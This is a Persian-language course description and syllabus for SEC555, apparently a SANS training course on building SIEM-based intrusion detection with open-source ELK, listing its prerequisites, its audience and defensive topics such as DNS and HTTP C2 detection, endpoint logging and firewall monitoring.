دوره SEC 555

در درس 555 یک سری از عملیات های کشف نفود که توسط SIEM در مرکز عملیات امنیت انجام می شود را با SIEM متن باز ،  ELK با هم مرور می کنیم. در این درس می آموزیم که چطور پروفایل سرویس ها را در بیاوریم. به آنها خصوصیاتی را بچسبانیم که بتوانیم نفوذ را کشف کرده و Endpoint ها را آنالیز و تحلیل کنیم و این تحلیل ها را در SIEM به خوبی انجام دهیم . یاد می گیریم توسط SIEM متن باز چطور رفتار کاربران را آنالیز و تحلیل کنیم و تخلف را کشف کرده و در نهایت تحلیل های پیچیده را با SIEM انجام داده تا بتوانیم APT را شناسایی کنیم .

پیش نیاز های دوره

مخاطبین دوره

  • SEC 504
  • SEC 503
  • SEC 511
  • کارشناسان امنیت
  • کارشناسان واحد پاسخگویی به حوادث
  • کارشناسان واحد مرکز عملیات امنیت

سرفصل دوره

State of the SOC/SIEM

Industry statistics

Industry problems

Log Monitoring

Assets

Windows/Linux

Network devices

Security devices

Data gathering strategies

Pre-planning

Logging architecture

Log inconsistencies

Log collection and normalization

Log retention strategies

Correlation and gaining context

Reporting and analytics

Alerting

SIEM platforms

Commercial solutions

Home-grown solutions

Planning a SIEM

Ingestion control

What to collect

Mission

SIEM Architecture

Ingestion techniques and nodes

Acceptance and manipulation for value

Augmentation of logs for detection

Data queuing and resiliency

Storage and speed

Analytical reporting

Visualizations

Detection Dashboards

Detection methods and relevance to log analysis

Attacker patterns

Attacker behaviors

Abnormalities

Analyzing common application logs that generate tremendous amounts of data

DNS

Finding new domains being accessed

Pulling in addition information such as domain age

Finding randomly named domains

Discover domain shadowing techniques

Identifying recon

Find DNS C2 channels

HTTP

Use large datasets to find attacks

Identify bot traffic hiding in the clear

Discover requests that users do not make

Find ways to filter out legitimate noise

Use attacker randomness against them

Identify automated activity vs user activity

Filter approved web clients vs unauthorized

Find HTTP C2 channels

HTTPS

Alter information for large scale analysis

Analyze certificate fields to identify attack vectors

Track certificate validity

Apply techniques that overlap with standard HTTP

Find HTTPS C2 channels

SMTP

Identify where unauthorized email is coming from

Find compromised mail services

Fuzzy matching likely phishing domains

Data exfiltration detection

Apply threat intelligence to generic network logs

Active Dashboards and Visualizations

Correlate network datasets

Build frequency analysis tables

Establish network baseline activity

Endpoint logs

Understanding value

Methods of collection

Agents

Agentless

Scripting

Adding additional logging

EMET

Sysmon

Group Policy

Windows filtering and tuning

Analyze critical events based on attacker patterns

Finding signs of exploitation

Find signs of internal reconnaissance

Finding persistence

Privilege escalation

Establishing a foothold

Cleaning up tracks

Host-based firewall logs

Discover internal pivoting

Identify unauthorized listening executables

See scan activity

Credential theft and reuse

Multiple failed logons

Unauthorized account use

Monitor PowerShell

Configure PowerShell logging

Identify obfuscation

Identify modern attacks

Security Architecture – Endpoint Protection

Anti-Malware

Host-based Firewall, Host-based IDS/IPS

Application Control, Application Virtualization

Privileged Accounts, Authentication, Monitoring, and UAC

Virtual Desktop Infrastructure

Browser Security

EMET and Defender Exploit Guard

Patching

Process

To Test or Not to Test

Microsoft

Third-Party

Centralize NIDS and HIDS alerts

Analyze endpoint security logs

Provide alternative analysis methods

Configure tagging to facilitate better reporting

Augment intrusion detection alerts

Extract CVE, OSVDB, etc for further context

Pull in rule info and other info such as geo

Analyze vulnerability information

Setup vulnerability reports

Correlate CVE, OSVDB, and other unique IDs with IDS alerts

Prioritize IDS alerts based on vulnerability context

Correlate malware sandbox logs with other systems to identify victims across enterprise

Monitor Firewall Activity

Identify scanning activity on inbound denies

Apply auto response based on alerts

Find unexpected outbound traffic

Baseline allow/denies to identify unexpected changes

Apply techniques to filter out noise in denied traffic

SIEM tripwires

Configure systems to generate early log alerts after compromise

Identify file and folder scan activity

Identify user token stealing

Operationalize virtual honeypots with central logging

Allow phone home tracking

Post mortem analysis

Re-analyze network traffic

Identify malicious domains and IPs

Look for beaconing activity

Identify unusual time-based activity

Use threat intel to reassess previous data fields such as user-agents

Utilize hashes in log to constantly re-evaluate for known bad files